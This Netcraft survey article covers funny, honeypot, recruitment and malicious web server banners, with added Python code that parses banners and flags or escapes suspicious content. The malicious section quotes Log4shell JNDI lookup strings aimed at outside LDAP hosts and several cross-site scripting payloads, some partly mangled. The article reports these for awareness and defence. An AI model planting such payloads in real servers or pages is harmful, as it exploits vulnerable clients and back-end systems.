Funny and malicious server banners


Netcraft’s latest Web Server Survey includes nearly 1.2 billion websites. Most of these sites return a server banner that reveals which web server software they use, which has allowed us to determine the market share of each server vendor since 1995.

Many of these server banners are simply short strings like “Apache”, while others may include additional details that reveal which other software, and which versions, are installed on the server. One such example is “Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.2k-fips DAV/2 PHP/5.5.38”.

Chrome’s Network Inspector showing the HTTP response headers for, which uses the nginx web server. It does not reveal a version number.

A web server reveals its server banner through the Server HTTP response header. This string is not usually shown to users, but most web browsers allow it to be viewed in the Network Inspector panel.

Custom banners

Web server software usually allows its server banner to be modified. A common reason for changing the default value is to reduce the amount of information that would be revealed to an attacker.

For example, if a web server advertises itself as running a vulnerable version of Apache, such as “Apache/2.4.49”, it may be more likely to come under attack than a server that reveals only “Apache”.
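To audit what a banner gives away, the Server value can be split into its product tokens and comments. The following is an added example, not code from the survey; the function names are assumptions, and the sample values are the banners quoted above.

```python
import re

# RFC 9110 "token" characters, used for product names and versions alike.
_TCHAR = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_ITEM = re.compile(
    rf"\s*(?:(?P<name>{_TCHAR})(?:/(?P<version>{_TCHAR}))?"
    rf"|\((?P<comment>[^()]*)\))"
)


def parse_server_banner(value):
    """Split a Server header into products and comments.

    Returns (products, comments, well_formed), where products is a list of
    (name, version-or-None) pairs. well_formed is False when some part of
    the value does not fit the product/comment grammar.
    """
    value = value.strip()
    products, comments, pos = [], [], 0
    while pos < len(value):
        m = _ITEM.match(value, pos)
        if m is None:
            return products, comments, False
        if m.group("name"):
            products.append((m.group("name"), m.group("version")))
        else:
            comments.append(m.group("comment"))
        pos = m.end()
    return products, comments, True


def disclosed_versions(value):
    """Return the name/version pairs that a banner reveals."""
    products, _, _ = parse_server_banner(value)
    return [f"{n}/{v}" for n, v in products
            if v and any(ch.isdigit() for ch in v)]


if __name__ == "__main__":
    # Banners quoted in the article text.
    for banner in ("Apache",
                   "Apache/2.4.49",
                   "Apache/2.2.32 (Unix) mod_ssl/2.2.32 "
                   "OpenSSL/1.0.2k-fips DAV/2 PHP/5.5.38"):
        print(banner, "->", disclosed_versions(banner))
```

A banner that returns an empty list here still names the product; only the version details have been withheld.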

Our Web Server Survey includes a few websites that return the following Server header, which takes a deliberate swipe at the effectiveness of hiding this type of information:


Of course, with this amount of flexibility, a cheeky or malicious administrator can configure a web server to pretend to be anything they want. Sometimes this is done in a deliberate attempt to cloak the truth or to mislead, while in others it may simply be done as a joke waiting to be found by anyone curious enough to look for the banner.

Unlikely server banners

Among the 1.2 billion websites, there are lots of examples of unlikely server banners.

There are numerous web servers that claim to be running on a Commodore 64, but are more than likely not.

And whilst it is possible for a web server to be powered by a potato, one of the most famous examples that hit the news 22 years ago ultimately turned out to be a hoax. Today, possibly in homage to this prank, there are several hundred websites that return a “Server: Potato” response header.

Perhaps to avoid any ambiguities with a Debian distribution from the same era named Potato, there are also lots of websites that claim to be running on “An actual potato with wires standing out of it”. A number of servers also claim to be running “GLaDoS PoTaTo”, which is a reference to the potato battery that powers the antagonist in the game Portal 2. All of the purportedly potato-powered web servers imply that there is only one potato involved in the generation of electricity (other examples include “A Single Potato” and “a potato”), with the only exception being a small number of servers that have adopted a higher-tech approach with “somme potatoes connected together” [sic].

Screenshot of a potato-powered GLadDOS in Portal 2

Not a web server: A fictional potato-powered computer in the game Portal 2.

A handful of websites return the following server header, which includes an excessive number of software names and versions that are unlikely in practice:


This type of honeypot banner is a red herring for automated attack software that is looking for vulnerable websites to exploit.

We also see server banners being used to ask the most profound questions, such as:

Why do you Care?
Why look here?
Who wants to know that?
What are you looking at?
Do You Come Here Often?
Without feelings of respect, what is there to distinguish men from beasts?
What is the air speed velocity of an unladen swallow?

Other strange server banners are used to convey messages or stories. One such example is the website of a self-confessed computer geek that returns the following lengthy server banner, which recounts the story of Darth Plagueis, a fictional character from the Star Wars franchise:

Did you ever hear the tragedy of Darth Plagueis the Wise? I thought not. It’s not a story the Jedi would tell you. It’s a Sith legend. Darth Plagueis was a Dark Lord of the Sith, so powerful and so wise he could use the Force to influence the midichlorians to create life. He had such a knowledge of the dark side that he could even keep the ones he cared about from dying. The dark side of the Force is a pathway to many abilities some consider to be unnatural. He became so powerful the only thing he was afraid of was losing his power, which eventually, of course, he did. Unfortunately, he taught his apprentice everything he knew, then his apprentice killed him in his sleep. Ironic. He could save others from death, but not himself.



There are numerous examples of websites hiding recruitment pitches in HTTP response headers, HTML comments, JavaScript, and other places that are only likely to be noticed by the curious. These techniques are usually used to advertise tech job vacancies, where the method of discovery increases the likelihood of applicants having at least some of the skills or qualities required to do the job well.

Some websites therefore use the server banner to deliver these messages, as it is an easy-to-configure place to put the message whilst still making it practically invisible to the majority of visitors.

Some examples of server banners being used for recruitment purposes include:

Hiring/4.0 (https://[redacted] jobs/roles/digital-tech-data/)
Hey! We are hiring! :-) Send your CV to hr@[redacted] com with ‘Server’ subject.
We’re Hiring Ninjas.

Malicious server banners

Amid the many examples of jokey server banners, there are some that delve into murkier territory. Various websites return specially crafted server banners that attempt to exploit security vulnerabilities in the clients that visit the sites, in back-end systems that subsequently process the strings, or on web pages where the server banner is redisplayed.

Some of these server banners are designed only to detect or demonstrate the presence of vulnerabilities in a benign fashion, whereas some are overtly malicious.

Log4shell exploits

A small number of websites in our latest Web Server Survey attempt to exploit the recent Log4shell vulnerability in Log4j by setting server banners similar to the following:

${jndi:ldap://.}
${jndi:ldap://7a1eng6l1rospa9ls03eipgqd.}

If one of the LDAP URLs in these server banners receives any requests, the “attacker” will know the site presenting the banner has been visited by a bot or other type of client that ultimately uses a vulnerable version of Log4j to log the string.

While these instances are currently benign and may well be done purely out of curiosity or in a legitimate attempt to claim bug bounties, they are nonetheless capable of detecting vulnerable clients or back-ends, and the payloads could be turned malicious at any time.

Cross-site scripting

There are several websites with server banners that contain cross-site scripting (XSS) payloads, some of which are specially crafted in an attempt to bypass filters. Here are several examples:

<< script>> alert(‘ Im Seeing You!’)<. b"><> < h1>> e<< script>> alert(‘ benc’);<. << script>> alert(‘ XSS’)<. << script src=// 0d. al><> .
<< script>> alert(” HACKED!”);<. << script>> alert( 1 )<. "><> < script src=""><> jaVasCript:”/ *’/ *’/ *”/ *<
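For a crawler or dashboard that stores and redisplays banners, both the Log4shell and XSS cases above come down to treating the Server value as untrusted input. The following is an added example, not code from the survey; the function names, the finding labels and the `collector.example` host are assumptions constructed for illustration.

```python
import html
import re

# Patterns for the banner contents described above.
CHECKS = [
    ("lookup-syntax", re.compile(r"\$\{")),               # Log4j-style ${...}
    ("html-markup", re.compile(r"<\s*/?\s*[a-zA-Z!]")),   # start of a tag
    ("script-url", re.compile(r"javascript\s*:", re.I)),  # any letter case
    ("control-chars", re.compile(r"[\x00-\x1f\x7f]")),    # CR/LF and friends
]
CONTROL = CHECKS[3][1]


def inspect_banner(value):
    """Return the labels of every check that the banner trips."""
    return [name for name, pattern in CHECKS if pattern.search(value)]


def for_log(value, limit=200):
    """Render a banner for one log line: bounded, single-line, no '${'.

    Breaking the '${' prefix is defence in depth for a logger that might
    still expand lookups; running a patched Log4j is the actual fix.
    """
    text = CONTROL.sub(lambda m: f"\\x{ord(m.group()):02x}", value[:limit])
    return text.replace("${", "$\\{")


def for_html(value):
    """Render a banner for redisplay inside an HTML page or attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    # Constructed sample banners; the host name is a placeholder.
    samples = [
        "nginx",
        "${jndi:ldap://collector.example/a}",
        "<script>alert(1)</script>",
        "Apache\r\nX-Injected: 1",
    ]
    for s in samples:
        print(inspect_banner(s), "|", for_log(s), "|", for_html(s))
```

Escaping happens at each output boundary (log line, HTML page), while the raw value and its findings can be stored separately for analysis.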
